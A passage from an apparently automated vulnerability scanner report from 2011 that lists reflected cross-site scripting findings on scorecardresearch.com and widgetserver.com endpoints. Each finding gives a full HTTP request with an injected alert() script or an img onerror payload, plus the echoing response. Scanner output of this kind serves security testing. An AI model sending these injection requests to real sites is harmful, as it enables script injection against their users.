Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:46 GMT
Date: Tue, 26 Apr 2011 18:39:46 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!2724d<script>alert(1)</script>ef3e74934bc", c5:"62431291", c6:"", c10:"", c15:"", c16:"", r:""});



5.106. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 41c00<script>alert(1)</script>f9b5dad6c03 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=6243129141c00<script>alert(1)</script>f9b5dad6c03&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:47 GMT
Date: Tue, 26 Apr 2011 18:39:47 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"6243129141c00<script>alert(1)</script>f9b5dad6c03", c6:"", c10:"", c15:"", c16:"", r:""});



5.107. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 98717<script>alert(1)</script>403ae54048e was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=98717<script>alert(1)</script>403ae54048e& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:47 GMT
Date: Tue, 26 Apr 2011 18:39:47 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!", c4:".id!", c5:"62431291", c6:"98717<script>alert(1)</script>403ae54048e", c10:"", c15:"", c16:"", r:""});



5.108. http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/ [REST URL parameter 18]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/

Issue detail

The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload 567db<img%20src%3da%20onerror%3dalert(1)>4321673800c was submitted in the REST URL parameter 18. This input was echoed as 567db<img src=a onerror=alert(1)>4321673800c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74567db<img%20src%3da%20onerror%3dalert(1)>4321673800c/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:51:09 GMT
Expires: Fri, 29 Apr 2011 21:50:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 3871

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"target4=http%3A%2F%2Fwww.widgetbox.com%2Faffiliate%2F315%2F%3Fr%3D%2Fmobile%2Fmake%2F&target3=http%3A%2F%2F
...[SNIP]...
romGalleryPK":"","sendsMessages":false,"isAdEnabled":false,"adPlacement":"BRH","categories":"","thumbFilePath":"/images/no-thumb.gif"}],"token":"0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74567db<img src=a onerror=alert(1)>4321673800c"});

5.109. http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 74b03<a>2abf9f455e2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b74b03<a>2abf9f455e2/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:48:26 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 1162

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"077f25c8-0348-4215-9539-57b2ff17f13b74b03<a>2abf9f455e2","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

5.110. http://cdn.widgetserver.com/syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/ [REST URL parameter 18]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/

Issue detail

The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload 780d0<img%20src%3da%20onerror%3dalert(1)>252d78a442 was submitted in the REST URL parameter 18. This input was echoed as 780d0<img src=a onerror=alert(1)>252d78a442 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211780d0<img%20src%3da%20onerror%3dalert(1)>252d78a442/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/builder/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:51:54 GMT
Expires: Fri, 29 Apr 2011 21:50:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 3912

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"siteConfig=%7B%22icon%22%3A+%22%22%2C+%22phoneIcon%22%3A%22%22%2C+%22tabletIcon%22%3A%22%22%2C+%22startupIm
...[SNIP]...
es":false,"isAdEnabled":false,"adPlacement":"","categories":"","thumbFilePath":"/thumbs/6ba05ce8-62f3-46d0-bb21-b5f833b4817f.png?367"}],"token":"34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211780d0<img src=a onerror=alert(1)>252d78a442"});

5.111. http://cdn.widgetserver.com/syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16936<a>d3f95d2f680 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe16936<a>d3f95d2f680/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/builder/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:49:14 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 1162

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"3651dbe5-aec4-42b2-8270-d62db9a25bfe16936<a>d3f95d2f680","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

5.112. http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/ [REST URL parameter 18]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/

Issue detail

The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload b607c<img%20src%3da%20onerror%3dalert(1)>58e425fd2c2 was submitted in the REST URL parameter 18. This input was echoed as b607c<img src=a onerror=alert(1)>58e425fd2c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168b607c<img%20src%3da%20onerror%3dalert(1)>58e425fd2c2/u/1/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:49:27 GMT
Expires: Fri, 29 Apr 2011 21:48:27 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 7210

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"wbx_theme_mod=%236DA4D8&wbx_stageHeight=500&wbx_tab_1_default_image=http%3A%2F%2Ffiles.widgetbox.com%2Fserv
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e.jpg?52"}],"token":"095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168b607c<img src=a onerror=alert(1)>58e425fd2c2"});

5.113. http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78066<a>4feec1bf34c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b78066<a>4feec1bf34c/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:46:37 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 1162

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"9dc88731-b2ec-4909-9bc6-b15b8881219b78066<a>4feec1bf34c","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

5.114. http://cdn.widgetserver.com/syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/ [REST URL parameter 18]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/

Issue detail

The value of REST URL parameter 18 is copied into the HTML document as plain text between tags. The payload b670d<img%20src%3da%20onerror%3dalert(1)>0648de1f413 was submitted in the REST URL parameter 18. This input was echoed as b670d<img src=a onerror=alert(1)>0648de1f413 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1b670d<img%20src%3da%20onerror%3dalert(1)>0648de1f413/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:51:54 GMT
Expires: Fri, 29 Apr 2011 21:50:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 2654

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"enabledState":"0","initParams":"wbx_framerate=30&wbx_stageHeight=250&wbx_stageWidth=300","isFlashWrapperCompatible":true,"appWidth":"300","
...[SNIP]...
,"isAdEnabled":true,"adPlacement":"","categories":"blogs,news","thumbFilePath":"/thumbs/8e8d4b61-3cef-4782-bdf3-34277bd49172.png?132"}],"token":"e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1b670d<img src=a onerror=alert(1)>0648de1f413"});

5.115. http://cdn.widgetserver.com/syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5147c<a>ad3be1bde7f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f55147c<a>ad3be1bde7f/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/?callback=WIDGETBOX.subscriber.Main.onWidgetInfoResponse HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:49:04 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 1162

WIDGETBOX.subscriber.Main.onWidgetInfoResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"a2cf3a06-8341-401d-9929-c445542d58f55147c<a>ad3be1bde7f","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

5.116. http://cdn.widgetserver.com/syndication/mobile/x/css/preview.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/mobile/x/css/preview.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f0666<script>alert(1)</script>06d3328fdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /syndication/mobilef0666<script>alert(1)</script>06d3328fdbc/x/css/preview.css?48996 HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
